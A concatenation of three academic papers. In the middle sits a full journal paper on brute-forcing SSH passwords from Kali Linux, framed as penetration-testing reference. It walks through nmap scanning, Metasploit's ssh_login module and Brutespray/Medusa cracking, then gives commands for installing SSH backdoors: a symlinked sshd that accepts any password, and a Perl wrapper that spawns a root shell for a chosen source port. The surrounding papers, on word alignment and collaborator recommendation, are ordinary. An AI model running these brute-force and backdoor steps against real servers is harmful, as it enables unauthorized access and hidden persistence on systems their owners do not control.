on the FBIS data set). 297 find all the systems yield better performance when using more training data. Our soft cohesion systems still produce better AERs than other systems, suggesting that our soft cohesion model is very effective for large-scale word alignment tasks. 5.3 Machine Translation Quality Comparison We then evaluate the effect of word alignment on machine translation quality using the phrase-based translation system Moses (Koehn et al., 2007). We take NIST MT03 test data as the development set, NIST MT05 test data as the testing set. We train a 5-gram language model with the Xinhua portion of English Gigaword corpus and the English side of the training set using the SRILM Toolkit (Stolcke, 2002). We train machine translation models using GDFA alignments of each system. BLEU scores on NIST MT05 are listed in Table 7, where BLEU scores are calculated using lowercased and tokenized data (Papineni et al., 2002). Although the IBM4-L0, Agree-HMM, Tree-Distance and Hard-Cohesion systems improve word alignment than IBM4, they fail to outperform the IBM4 system on machine translation. The BLEU score of our Soft-Cohesion-EM system is better than the IBM4 system when using the FBIS training set, but worse when using the LARGE training set. Our Soft-Cohesion-Gibbs system produces the best BLEU score when using both training sets. We also performed a statistical significance test using bootstrap resampling with 1000 samples (Koehn, 2004; Zhang et al., 2004). Experimental results show the Soft-Cohesion-Gibbs system is significantly better (p<0.05) than the IBM4 system. The IBM4-Prior system slightly outperforms IBM4, but it’s not significant. 6 Related Work There have been many proposals of integrating syntactic knowledge into generative alignment models. Wu (1997) proposed the inversion transduction grammar (ITG) to model word alignment as synchronous parsing for a sentence pair. Yamada and Knight (2001) represented translation as a sequence of re-ordering operations over child nodes of a syntactic tree. Gildea (2003) introduced a “loosely” tree-based alignment technique, which allows alignments to violate syntactic constraints by incurring a cost in probability. Pauls et al. (2010) gave a new instance of the ITG formalism, in which one side of the synchronous derivation is constrained by the syntactic tree. Fox (2002) measured syntactic cohesion in gold standard alignments and showed syntactic cohesion is generally maintained between English and French. She also compared three variant syntactic representations (phrase tree, verb phrase flattening tree and dependency tree), and found the dependency tree produced the highest degree of cohesion. So Cherry and Lin (2003; 2006a) used dependency cohesion as a hard constraint to restrict the alignment space, where all potential alignments violating cohesion constraint are ruled forward reverse HCP MCP HCP MCP IBM4 60.53 63.94 56.15 64.80 IBM4-L0 60.57 62.53 66.49 65.68 IBM4-Prior 66.48 74.65 67.19 72.32 Agree-HMM 75.52 66.61 73.88 66.07 Tree-Distance 81.37 74.69 78.00 71.73 Hard-Cohesion 98.70 97.43 98.25 97.84 Soft-Cohesion-EM 85.21 81.96 82.96 81.36 Soft-Cohesion-Gibbs 88.74 85.55 87.81 84.83 gold-standard 88.43 95.82 81.53 91.62 Table 5: HCPs and MCPs on the development set. FBIS LARGE IBM4 30.7 33.1 IBM4-L0 30.4 32.3 IBM4-Prior 30.9 33.2 Agree-HMM 27.2 30.1 Tree-Distance 28.2 N/A Hard-Cohesion 30.4 32.2 Soft-Cohesion-EM 30.9 33.1 Soft-Cohesion-Gibbs 31.6* 33.9* Table 7: BLEU scores, where * indicates significantly better than IBM4 (p<0.05). forward reverse GDFA IBM4 37.45 39.18 40.52 IBM4-L0 38.17 38.88 39.82 IBM4-Prior 35.86 36.71 37.08 Agree-HMM 35.58 35.73 39.10 Hard-Cohesion 35.04 37.59 37.63 Soft-Cohesion-EM 30.93 32.67 33.65 Soft-Cohesion-Gibbs 32.07 32.68 32.28 Table 6: AERs on the testing set (trained on the LARGE data set). 298 out directly. Although the alignment quality is improved, they ignored situations where a small set of correct alignments can violate cohesion. To address this limitation, Cherry and Lin (2006b) proposed a soft constraint approach, which took dependency cohesion as a feature of a discriminative model, and verified that the soft constraint works better than the hard constraint. However, the training procedure is very time- consuming, and they trained the model with only 100 hand-annotated sentence pairs. Therefore, their method is not suitable for large-scale tasks. In this paper, we also use dependency cohesion as a soft constraint. But, unlike Cherry and Lin (2006b), we integrate the soft dependency cohesion constraint into a generative model that is more suitable for large-scale word alignment tasks. 7 Conclusion and Future Work We described a generative model for word alignment that uses dependency cohesion as a soft constraint. We proposed an approximate EM algorithm and an explicit Gibbs sampling algorithm for parameter estimation in an unsupervised manner. Experimental results performed on a large-scale data set show that our model improves word alignment quality as well as machine translation quality. Our experimental results also indicate that the soft constraint approach is much better than the hard constraint approach. It is possible that our word alignment model can be improved further. First, we generated word alignments in both forward and reverse directions separately, but it might be helpful to use dependency trees of the two sides simultaneously. Second, we only used the one-best automatically generated dependency trees in the model. However, errors are inevitable in those trees, so we will investigate how to use N-best dependency trees or dependency forests (Hayashi et al., 2011) to see if they can improve our model. Acknowledgments We would like to thank Nianwen Xue for insightful discussions on writing this article. We are grateful to anonymous reviewers for many helpful suggestions that helped improve the final version of this article. The research work has been funded by the Hi-Tech Research and Development Program ("863" Program) of China under Grant No. 2011AA01A207, 2012AA011101, and 2012AA011102 and also supported by the Key Project of Knowledge Innovation Program of Chinese Academy of Sciences under Grant No.KGZD-EW-501. This work is also supported in part by the DAPRA via contract HR0011-11-C- 0145 entitled "Linguistic Resources for Multilingual Processing". References Mohit Bansal, Chris Quirk, and Robert Moore, 2011. Gappy Phrasal Alignment By Agreement. In Proc. of ACL 2011. Peter F. Brown, Stephen A. Della Pietra, Vincent J. Della Pietra and Robert L. Mercer, 1993. The mathematics of statistical machine translation: Parameter estimation. Computational Linguistics, 19 (2). pages 263-311. C. Cherry and D. Lin, 2003. A probability model to improve word alignment. In Proc. of ACL '03, pages 88-95. C. Cherry and D. Lin, 2006a. A comparison of syntactically motivated word alignment spaces. In Proc. of EACL '06, pages 145-152. C. Cherry and D. Lin, 2006b. Soft syntactic constraints for word alignment through discriminative training. In Proc. of COLING/ACL '06, pages 105-112. John DeNero and Dan Klein, 2007. Tailoring word alignments to syntactic machine translation. In Proc. of ACL '07, pages 17. C. Dyer, J. Clark, A. Lavie and N.A. Smith, 2011. Unsupervised word alignment with arbitrary features. In Proc. of ACL '11, pages 409-419. Heidi J. Fox, 2002. Phrasal cohesion and statistical machine translation. In Proc. of EMNLP '02, pages 304-3111. Michel Galley, Mark Hopkins, Kevin Knight, Daniel Marcu, 2004. What's in a translation rule? In Proc. of NAACL '04, pages 344-352. J. Gao and M. Johnson, 2008. A comparison of Bayesian estimators for unsupervised Hidden Markov Model POS taggers. In Proc. of EMNLP '08, pages 344-352. Daniel Gildea, 2003. Loosely Tree-Based Alignment for Machine Translation. In Proc. of ACL'03, pages 80- 87. 299 K. Hayashi, T. Watanabe, M. Asahara and Y. Matsumoto, 2011. Third-order Variational Reranking on Packed-Shared Dependency Forests. In Proc. of EMNLP '11. M. Johnson, T. Griffiths and S. Goldwater, 2007. Bayesian inference for PCFGs via Markov chain Monte Carlo. In Proc. of NAACL '07, pages 139-146. Philipp Koehn, 2004. Statistical significance tests for machine translation evaluation. In Proc. of EMNLP'04. P. Koehn, H. Hoang, A. Birch, C. Callison-Burch, M. Federico, N. Bertoldi, B. Cowan, W. Shen, C. Moran and R. Zens, 2007. Moses: Open source toolkit for statistical machine translation. In Proc. of ACL '07, Demonstration Session, pages 177-180. Percy Liang, Ben Taskar and Dan Klein, 2006. Alignment by agreement. In Proc. of HLT-NAACL 06, pages 104-111. D. Lin and C. Cherry, 2003. Word alignment with cohesion constraint. In Proc. of NAACL '03, pages 49-51. Adam Lopez and Philip Resnik, 2005. Improved HMM alignment models for languages with scarce resources. In ACL Workshop on Building and Using Parallel Texts '05, pages 83-86. Cos ķun Mermer and Murat Saraçlar, 2011. Bayesian word alignment for statistical machine translation. In Proc. of ACL '11, pages 182-187. R.C. Moore, 2005. A discriminative framework for bilingual word alignment. In Proc. of EMNLP '05, pages 81-88. F.J. Och, C. Tillmann and H. Ney, 1999. Improved alignment models for statistical machine translation. In Proc. of EMNLP/WVLC '99, pages 20-28. Franz Josef Och and Hermann Ney, 2003. A systematic comparison of various statistical alignment models. Computational Linguistics, 29 (1). pages 19-51. K. Papineni, S. Roukos, T. Ward and W.J. Zhu, 2002. BLEU: a method for automatic evaluation of machine translation. In Proc. of ACL '02, pages 311- 318. Adam Pauls, Dan Klein, David Chiang and Kevin Knight, 2010. Unsupervised Syntactic Alignment with Inversion Transduction Grammars. In Proc. of NAACL '10. Slav Petrov, Leon Barrett, Romain Thibaux and Dan Klein, 2006. Learning accurate, compact, and interpretable tree annotation. In Proc. of ACL 2006. Jason Riesa and Daniel Marcu, 2010. Hierarchical search for word alignment. In Proc. of ACL '10, pages 157-166. Jason Riesa, Ann Irvine and Daniel Marcu, 2011. Feature-Rich Language-Independent Syntax-Based Alignment for Statistical Machine Translation. In Proc. of EMNLP '11. Darcey Riley and Daniel Gildea, 2012. Improving the IBM Alignment Models Using Variational Bayes. In Proc. of ACL '12. M. Saers, J. Nivre and D. Wu, 2010. Word alignment with stochastic bracketing linear inversion transduction grammar. In Proc. of NAACL '10, pages 341-344. A. Stolcke, 2002. SRILM-an extensible language modeling toolkit. In ICSLP '02. B. Taskar, S. Lacoste-Julien and D. Klein, 2005. A discriminative matching approach to word alignment. In Proc. of EMNLP '05, pages 73-80. Ashish Vaswani, Liang Huang, and David Chiang, 2012. Smaller alignment models for better translations: unsupervised word alignment with the l0 norm. In Proc. ACL'12, pages 311–319. Stephan Vogel, Hermann Ney and Christoph Tillmann, 1996. HMM-based word alignment in statistical translation. In Proc. of COLING-96, pages 836-841. D. Wu, 1997. Stochastic inversion transduction grammars and bilingual parsing of parallel corpora. Computational Linguistics, 23 (3). pages 377-403. Zhiguo Wang, Chengqing Zong, 2010. Phrase Structure Parsing with Dependency Structure, In Proc. of COLING 2010, pages 1292-1300. Zhiguo Wang, Chengqing Zong, 2011. Parse Reranking Based on Higher-Order Lexical Dependencies, In Proc. Of IJCNLP 2011, pages 1251-1259. Kenji Yamada and Kevin Knight, 2001. A syntax-based statistical translation model. In Proc. of ACL '01, pages 523-530. Ying Zhang, Stephan Vogel, and Alex Waibel. 2004. Interpreting BLEU/NIST scores: How much improvement do we need to have a better system? In Proc. of LREC. Shaojun Zhao and Daniel Gildea, 2010. A fast fertility hidden Markov model for word alignment using MCMC. In Proc. of EMNLP '10, pages 596-605. 300 work_tlrea27h5faizhj4uusgiwtrvi ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 35 Violence Cracking Technology of SSH Service Based on Kali-Linux Ma Limei College of Information Technology Hebei Normal University Shijiazhuang, In China Key Laboratory of Network and Information Security in Hebei Province Shijiazhuang, In China School of Information Studies, Dominican University, River Forest, In USA e-mail: malimei@hebtu.edu.cn Zhao Dongmei* College of Information Technology Hebei Normal University Shijiazhuang, In China Key Laboratory of Network and Information Security in Hebei Province Shijiazhuang, In China e-mail: 863141000@qq.com Gao Yijun School of Information Studies Dominican University River Forest, In USA e-mail: ygao@dom.edu Zhao Chen College of Information Technology Hebei Normal University Shijiazhuang, In China Key Laboratory of Network and Information Security in Hebei Province Shijiazhuang , In China e-mail: tczxz007@163.com Abstract—In this paper, the current popular SSH password brute force cracking tool is researched, analyzed and summarized. The ssh_login module in Metasploit is used to brute force the SSH service to finally obtain the password. The Brute Spray tool is used to automatically call Medusa to blast the service, demonstrating SSH. The process of brute force cracking has certain reference value for penetration attack testing and security defense. Keywords-Component; Violence Cracking; Technology; SSH Service; Kali-Linux All SSH is an acronym for Secure Shell, developed by the IETF's Network Working Group, SSH is a security protocol based on the application layer and transport layer. SSH is a protocol that provides security for remote login sessions and other network services. The SSH protocol can effectively prevent information leakage during remote management. SSH was originally a program on a UNIX system and later quickly expanded to other operating platforms. SSH can make up for vulnerabilities in the network when it is used correctly. The SSH client is available on multiple platforms. SSH can be run on almost all Unix platforms—including hp-Unix, Linux, Aix, Solaris, Digital Unix, and others. The Kali Linux Penetration Test Platform defaults to the SSH service. SSH for remote server management, you only need to know the server's IP address, port, management account and password, you can manage the server, network security follows the principle of wooden barrel, as long as you open a hole through SSH, this will be for infiltrators It is a new world. I. SSH PROVIDES TWO AUTHENTICATION METHODS. The first is a key-based security verification that relies on a key, which means you have to create a pair of keys for yourself and put the public key on the server you need to access. If you are connecting to an SSH server, the client software will make a request to the server for security verification with your key. After the server receives the request, look for your public key in your home directory on the server and compare it to the public key you sent. If the two keys match, the server encrypts the "challenge" with the public key and sends it to the client software. After the client software receives the "challenge", it can decrypt it with your private key and send it to the server. DOI: 10.21307/ijanmc-2019-045 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 36 The second is password-based security verification, as long as you know your account and password, you can log in to the remote host. All transmitted data will be encrypted, but there is no guarantee that the server you are connecting to is the one you want to connect to. There may be other servers that impersonate the real server, which is attacked by the "middleman". At the same time, if the server has no other security restrictions, such as login source IP, account login error times, there may be violent cracking. However, SSH is not absolutely secure. If you do not restrict the login source IP and do not set the number of attempts to log in, it will be cracked. II. SSH PASSWORD BRUTE FORCE APPLICATION AND THOUGHTS A. Application  The root permission is obtained through remote command execution such as Structs.  Get root privileges through web shell authorization  Through the local file contains the vulnerability, you can read all the files locally in linux.  Obtain the network access authority, which can access the intranet computer.  The SSH port is enabled on the external network (the default or modified port), and SSH access is available. In the previous scenarios, you can get the shadow file and brute force it to get the password of these accounts, but in other scenarios, no loopholes are available. At this time, you need to brute the SSH account. B. Thoughts  brute force the root account  use admin as the username to brute force  use the admin dictionary for password cracking  Using mastery information to organize social worker information and generate dictionary brute force cracking  Comprehensive utilization and recycling of information III. THE SPECIFIC STEPS ARE AS FOLLOWS: A. Purpose Master the process of brute-breaking the SSH service through the ssh login module in Metasploit to finally obtain the password. B. Software used Guest operating system: Kali-linux 1.1, IP address is 193.168.1.100. Server operating system: CentOS 6.5, address 193.168.1.26. Tool software: Metasploit, NMAP. C. Steps 1) Load the kali-linux virtual machine, open the kali system terminal, and use nmap to scan the target 193.168.1.26 port. The command is as follows: nmap - v -A -Pn 193.168.1.26, found that open 22 ports, you can try to brute force. The result is shown in Figure 1. Figure 1. NMAP scan results Parameter Description: -v: enable verbose mode; -A: Detect the target operating system; -Pn: Do not ping the target host to reduce the probability of being discovered or blocked by the guard device. 2) Open another new command line window, type ssh admin@193.168.1.26, enter the password arbitrarily, and the access is blocked. Try this process multiple times (3 times or more) and find that you can still try to enter the password, the user will not be locked, as shown in Figure 2, so all the conditions that satisfy the brute force vulnerability can be brute force cracked. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 37 Figure 2. Trying to log in 3) Use the ssh_login module in Metasploit to crack the crack, open the kali system terminal, and enter msfconsole, as shown in Figure 3. Figure 3. Start Metasploit 4) Enter search ssh_login and search for the ssh_login module, as shown in Figure 4. Figure 4. Searching for the ssh_login module 5) Enter use auxiliary/scanner/ssh/ssh_login to load the ssh_login module, as shown in Figure 5. Figure 5. Loading the ssh_login module 6) Enter show options to display the ssh_login module parameters, as shown in Figure 6. Figure 6. Ssh_login module parameters Explanation of important parameters: RHOST: the target host IP address; PASS_FILE: brute force password dictionary storage path; USERNAME: Specify the username used for brute force attack; STOP_ON_SUCESS: Set to stop brute force attack immediately after cracking the password. 7) Set the relevant parameters of the brute force target host, as shown in Figure 7. Figure 7. Set the parameters 8) Enter the exploit to start brute force cracking, and successfully obtain the password, which is admin888, as shown in Figure 8. Figure 8. Execution attack 9) Open the terminal, enter ssh admin@193.168.1.26, and enter the cracked password to log in to the server, as shown in Figure 9. Figure 9. Successful login to the server 10) Enter the command to view server related information, as shown in Figure 10. Figure 10. Execution system command International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 38 IV. USE BRUTESPRAY TO VIOLENTLY CRACK SSH PASSWORD Brutespray is a gnmap/XML file based on nmap scanning output. It calls Medusa automatically to explode the service faster than hydra. IBruteSpray calls medusa, which claims to support violent account cracking of ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin, smbnt, smtp, SVN and vmauthd protocols. A. Installation under Kali Brutespray is not integrated into Kali Linux by default. It needs to be installed manually. Some need to perform updates in Kali first, and apt-get update before executing the installation command: Apt-get install brutespray Kali Linux installs its user and password dictionary file location by default: / usr / share / brutespray / wordlist. B. Manual installation Git clone https://github.com/x90skysn3k/brutespray.git CD brutes pray PIP install-r requirements.txt Note that if Medusa needs to be installed in other environments, otherwise an error will be executed. C. Brutes Pray using parameters Usage: brutespray.py[-h]-f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-p PASSWORD] [-c] [-i] Usage: Python brutespray.py < Options > Option parameters: -h, --help displays help information and exits Menu options: -F FILE, -- File FILE parameter followed by a file name, parses the GNMAP or XML file output from nmap -O OUTPUT, -- output OUTPUT contains the directory of successful attempts -s SERVICE, --service SERVICE parameter followed by a service name specifies the service to be attacked -t THREADS, --threads THREADS parameter followed by a value specifying the number of Medusa threads -T HOSTS, - - hosts HOSTS parameter followed by a value specifying the number of hosts tested at the same time -U USERLIST, --userlist USERLIST parameter followed by user dictionary file -P PASSLIST - -- Passlist PASSLIST parameter followed by password dictionary file -u USERNAME, -- username USERNAME parameter followed by user name, specify a user name for blasting -P PASSWORD, --password PASSWORD parameter followed by password, specify a password for blasting - C.-- Continuous blasting after success - i --Interactive interaction mode V. VIOLENT CRACKING OF SSH PASSWORDS 1) Interactive mode cracking Python brutespray. py -- file nmap. XML - I After execution, the program automatically identifies the services in the nmap scanning results, chooses the services that need to be cracked according to the prompt, the number of threads, the number of hosts that are simultaneously violently cracked, specifies the user and password files, and Brutespray will display the “SUCCESS” information on the screen after successful cracking. VI. SSH BACKDOOR A. Soft Connected Backdoor ln-sf /usr/sbin/sshd/tmp/su; /tmp/su-oPort=33223; The classical backdoor uses SSH root@x.x.x-p 33223 to establish a soft connection to sshd directly, and then login with any password.But this is very weak, and protection scripts like Rookit hunter can be scanned. B. SSH Server wrapper back door 1) Copy sshd to bin directory CD /usr/sbin MV sshd. / bin 2) Editing sshd VI sshd // Add the following and save #!/usr /bin/perl Exec "/ bin / sh" if (get peername (STDIN) = ~/^.. LF/); Exec {"/usr/bin/sshd"}"/ usr/sbin/sshd", @ARGV; 3) Right to modify Chmod 755 sshd 4) Using socat International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 39 Socat STDIO TCP4: target_ip:22, sourceport = 19526 If socat is not installed, it needs to be installed and compiled WGet http://www.dest- unreach.org/socat/download/socat-1.7.3.2.tar.gz Tar-zxvf socat-1.7.3.2.tar.gz CD socat-1.7.3.2 ./configure Make Make install 5) Password-free login using SSH root@ target_ip VII. SSH PUBLIC KEY CRYPTOGRAPHY The local computer generates the public and private keys, copies the public key files to the ~/.ssh/authorized_keys files on the servers that need to be connected, and sets the corresponding permissions to log on to the server without password. Chmod 600 ~/.ssh/authorized_keys VIII. CONCLUSION By comparing the ssh brute force tests of the tools hydra, medusa, patator, brutepray and Metasploit, the summary is as follows: 1) Each software can successfully crack the ssh account and password. 2) Patator and brute spray are written in Python, but brutepray requires medusa support. 3) Hydra and medusa are written in C and need to be compiled. 4) Brutepray based on the results of nmap scan for brute force cracking, brute force effect after scanning the intranet. 5) Patator is based on python, fast, and compatible. It can be used in Windows or Linux. 6) If you have kali conditions or PentestBox, it is not bad to use Metasploit for ssh brute force cracking. 7) Brutespray will automatically generate the crack success log file /brutespray-output/ssh-success.txt; hydra plus parameter "-o save.log" record successfully cracked to the log file save.log, medusa plus "-O ssh.log The parameter can record the successfully cracked record into the ssh.log file; the patator can add the parameter "-x ignore:mesg='Authentication failed.'" to ignore the attempt to crack the failure, and only display the successful crack. Acknowledgment ACKNOWLEDGMENT This Project Supported by the National Natural Science Foundation of China（No.61672206） This Project Supported by the National Natural Science Youth Foundation of China (No.61703136) Author: Ma Limei, Associate Professor, Hebei Normal University, Dominican University of America visiting scholars, research field: cyber security, machine learning and artificial neural network Correspondence Author: Zhao Dongmei, Professor, Hebei Normal University, research field: cyber security, machine learning, information Technology REFERENCES [1] Shen Qingni, Qingsi. Operating system security design. Beijing: Machinery Industry Press, 2013. [2] Yu Chaohui, Wang Changzheng, Zhao Yicheng. Practical Treasure Book of Network Security System Protection and Hacker Attack and Defense. Beijing: China Railway Publishing House, 2013. Author. Thesis Title [D]. Journal of Tsinghua University, 2016, 27 (1): 1-8. [3] Evi Nemeth, Garth Snyder, Trent R. Hein, Ben Whaley. UNIX and Linux System Administration Handbook (4th Edition) [4] Tianhe Culture. Hacker attack and defense from entry to proficiency (attack and defense and script programming). Beijing: Machinery Industry Press, 2015. [5] Cao Hanming. Hacker Attack and Defense. Nanjing: Southeast University Press, 2014. [6] Jiang Youxu, Guo Quanshui, Ma Juan, et al. Classification and community characteristics of forest communities in China [M]. Beijing: Science Press, 1998. [7] Songhua Luo Jianzhen Jiang Yuexia. Study on the Security Strategy of Electronic Document Filing in the Environment of Government Cloud [D]. Zhejiang Archives, 2018. [8] Dong Zhenliang. Application of cryptographic algorithms and international standardization [D]. Financial Information Center of the People's Bank of China, 2018. [9] Zhou Yinqing, Ouyang Zichun. Brief discussion on the implementation and management of information system security level protection evaluation [D]. Digital Communication World, 2018. [10] Liang Lixin and Li Jun. Information Security Level Protection Evaluation Based on Virtualization [D]. Police Technology, 2014 [11] Ma Limei, Wang Fangwei. Computer Network Security and Experimental Course, tsinghua university press,ISBN:9787302439332 [12] Ma Limei,Guo Qing,Zhang Linwei Ubuntu Linux operating system and Experimental Course, tsinghua university press,ISBN:9787302438236 work_tnmbm7issbbq7crsyarn5qtlve ---- Submitted 26 October 2018 Accepted 8 February 2019 Published 4 March 2019 Corresponding author Liangtian Wan, wan.liangtian.2015@ieee.org Academic editor Diego Amancio Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.178 Copyright 2019 Xu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A serendipity-biased Deepwalk for collaborators recommendation Zhenzhen Xu, Yuyuan Yuan, Haoran Wei and Liangtian Wan Key Laboratory for Ubiquitous Network and Service Software of Liaoning Province, School of Software, Dalian University of Technology, Dalian, Liaoning, China ABSTRACT Scientific collaboration has become a common behaviour in academia. Various recommendation strategies have been designed to provide relevant collaborators for the target scholars. However, scholars are no longer satisfied with the acquainted collaborator recommendations, which may narrow their horizons. Serendipity in the recommender system has attracted increasing attention from researchers in recent years. Serendipity traditionally denotes the faculty of making surprising discoveries. The unexpected and valuable scientific discoveries in science such as X-rays and penicillin may be attributed to serendipity. In this paper, we design a novel recommender system to provide serendipitous scientific collaborators, which learns the serendipity-biased vector representation of each node in the co-author network. We first introduce the definition of serendipitous collaborators from three components of serendipity: relevance, unexpectedness, and value, respectively. Then we improve the transition probability of random walk in DeepWalk, and propose a serendipity-biased DeepWalk, called Seren2vec. The walker jumps to the next neighbor node with the proportional probability of edge weight in the co-author network. Meanwhile, the edge weight is determined by the three indices in definition. Finally, Top-N serendipitous col- laborators are generated based on the cosine similarity between scholar vectors. We conducted extensive experiments on the DBLP data set to validate our recommendation performance, and the evaluations from serendipity-based metrics show that Seren2vec outperforms other baseline methods without much loss of recommendation accuracy. Subjects Data Mining and Machine Learning, Data Science, Network Science and Online Social Networks, Social Computing Keywords Deepwalk, Collaborators recommendation, Serendipity, Vector representation learning, Scholarly big data INTRODUCTION In academia, the rapid accumulation of scholarly data has produced an overload of academic information, and scholars are lost in it because of the difficulty in accessing useful information. The appearance of a recommender system alleviates the problem, i.e., providing relevant collaborators for target scholars, which focuses on improving the recommendation accuracy. Most recommendation approaches build the profiles of target scholars based on their interests or research contents, and then provides a list of collaborators who have similar profiles with them. However, researchers are no longer satisfied with the relevant or acquainted recommendations, which may narrow their horizons in the long term. Furthermore, How to cite this article Xu Z, Yuan Y, Wei H, Wan L. 2019. A serendipity-biased Deepwalk for collaborators recommendation. PeerJ Comput. Sci. 5:e178 http://doi.org/10.7717/peerj-cs.178 https://peerj.com mailto:wan.liangtian.2015@ieee.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.178 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.178 accuracy is not the absolute metric in determining good recommendation performance, and it sometimes hurts the recommender systems for lacking novelty and diversity (Sean, McNee & Konstan, 2006; McNee, Riedl & Konstan, 2006). Under this circumstance, serendipity is taken into consideration in terms of satisfying users when designing or evaluating the recommender systems (Kotkov, Wang & Veijalainen, 2016). The concept of serendipity can be understood flexibly in most cases, which has different implications under different scenarios. Additionally, the serendipitous encounters are rare in both academia and daily life of researchers. Therefore, no consensus is reached on the definition of serendipity. In this paper, we aim to recommend the serendipitous scientific collaborators for target scholars by learning the vector representation of each scholar node in co-author network. The first essential step of this work is the definition of serendipitous collaborators. We induce the definition by three components of serendipity, which are relevance, unexpectedness, and value, respectively. Relevance is quantified as the proximity between two connected nodes in co-author network. Unexpected collaborators have research topics that are different from the topics of their target scholars; therefore, they usually have diverse research topics compared with their target scholars. While the value of a collaborator is quantified as the eigenvector (Bonacich, 2007) of the collaborator node in the co-author network, which represents the influence of this collaborator. According to the nature of serendipity, we define that serendipitous collaborators are more unexpected and valuable, but less relevant for their target scholars. We reserve lower relevance for the significance of serendipity, because relevance caters to the preferences of target scholars. While the core components of serendipity are unexpectedness and value. Consequently, the intuitive definition is that a serendipitous collaborator has high topic diversity, high influence and low network proximity relatively for his/her target scholar. The second essential step is the design of appropriate recommendation algorithm. Though collaborative filtering is the most universal recommendation approach (Kim et al., 2010; Konstas, Stathopoulos & Jose, 2009), it is not yet applicable to our recommendation scenario. Recently, researchers have shown increasing interest in the technology of network embedding. The vector representations of network nodes have also been applied to many prediction and recommendation tasks by learning relevant features of nodes successfully (Perozzi, Al- Rfou & Skiena, 2014; Grover & Leskovec, 2016; Tian & Zhuo, 2017). In this case, we design a serendipitous collaborators recommendation strategy by improving DeepWalk (Perozzi, Al-Rfou & Skiena, 2014), where the walker jumps to the next node based on the proportional probability of its edge weight with the connected node in co-author network. Besides, the edge weight between a collaborator and his/her target scholar is determined by the extent of serendipity. Therefore, this is a serendipity-biased DeepWalk for learning the vector representation of each author node in co-author network, and we call it Seren2vec. Seren2vec embeds each author node with a low-dimensional vector that carries serendipity between collaborators in the co-author network. We extract Top-N collaborators for recommendation based on the cosine similarity between author vectors. To the best of our knowledge, this is the first work that takes serendipity into consideration when designing the collaborators recommender system. Our strategy enabled us to simultaneously improve the serendipity of the recommendation list and to maintain Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 2/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 adequate accuracy. The definition of serendipitous collaborators is also significant for further mining the interesting collaboration mechanism in science. The main contributions of this paper can be summarized as follows: • Define serendipitous scientific collaborators: we propose the intuitive definition of serendipitous scientific collaborators from three indices, which are network proximity, topic diversity, and collaborator influence, respectively. • Propose a serendipity-biased DeepWalk (Seren2vec): we improve the process of random walk in DeepWalk for serendipitous collaborators recommendation. The walker jumps to the next neighbor node with the proportional probability of its edge weight with the connected node, and the edge weight is determined by the extent of serendipity. Therefore, the vector representation of each author node is serendipity-biased. • Recommend serendipitous scientific collaborators: we perform Seren2vec to learn the representation of each author node with low-dimensional vector, and then extract the Top-N similar collaborators by computing the cosine similarity between the target vector and other author vectors. • Analyze and evaluate the recommendation results: we conduct extensive experiments on the subset of DBLP, and evaluate the recommendation results from both accuracy- based and serendipity-based metrics. Furthermore, we compare the recommendation performance of Seren2vec with other baseline methods for validating our scheme. In the following sections: we first briefly review the related work, including the widely used collaborators recommendation approaches and the integration of serendipity in recommender systems. The proposed definition of serendipitous scientific collaborators and the corresponding indices are analyzed and quantified in ‘The Definition of Serendipitous Collaborators’. The framework of our method is discussed in ‘The Framework of Seren2vec’. The experimental results and metrics for evaluation are presented in ‘Experiments’. Finally we conclude the paper in the last section. RELATED WORK Researchers have designed various academic recommender systems for scientific applications. However, most existing recommendation approaches aim to improve the recommendation accuracy based on the profile similarity between users. Long-term use of such recommender systems will degrade the user satisfaction, since most recommendations are the acquaintances of target users. The serendipity-related elements have attracted increasing attention from researchers for designing serendipitous recommender systems, such as novelty, unexpectedness, diversity, etc. In this section, we summarize the widely used collaborators recommendation approaches, the existing technologies for integrating serendipity into recommendation systems, and the serendipity-based metrics for evaluating the recommendation results. Xu et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.178 3/19 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.178 Scientific collaborators recommender systems Methods for recommending scientific collaborators have been studied for decades. The recommendation methods can be divided into content-based, collaborative filtering-based, and random walk-based algorithms on the whole. Content-based recommendation Content-based method is a basic and widely used technique for recommending collaborators. The critical process of content-based collaborators recommendation is the scholar profile modelling, where the interests or topics of scholars can be inferred from their publication contents by extracting the words from title, abstract, keywords, etc. Many topic modeling techniques such as Word2vec (Goldberg & Levy, 2014), LDA (Latent Dirichlet Allocation) (Blei, Ng & Jordan, 2003) and pLSA (Probabilistic Latent Semantic Analysis) (Hofmann, 2017) enable to generate the probability distribution of these words, and they also contribute to generate the feature descriptions of different scholars. A collaborator recommendation list is finally generated by computing the profile similarity between scholars. Gollapalli, Mitra & Giles (2012) proposed a recommendation model by computing the similarity between expertise profiles. Besides, the expertise profiles are extracted from researchers’ publications and academic home pages. Lopes et al. (2010) took the area of researchers’ publications and the vector space model to make collaboration recommendation. The scientific collaboration mechanism is complex for the various factors. Wang et al. (2017) investigated the academic-age-aware collaboration behaviors, which may guide and inspire the collaborators recommendation strategies. Collaborative filtering-based recommendation Collaborative filtering-based method is popular in the field of recommender system. The core of collaborative filtering is to find items via the opinions of other similar users whose previous history strongly correlates with the target user. In other words, the similar users have similar interests with the target user (Jannach et al., 2010). Finally, the items positively rated by the similar users will be recommended to the target user. Heck, Peters & Stock (2011) performed a collaborative filtering method via the co-citation and bibliographic coupling to detect author similarity. However, the cold start problem exists to degrade the recommendation performance, because it is difficult to find similar scholars without enough information of a new scholar. Content-based algorithms require contents to analyze by utilizing Natural Language Processing (NLP) tools, therefore the collaborative filtering-based algorithms are more easy to 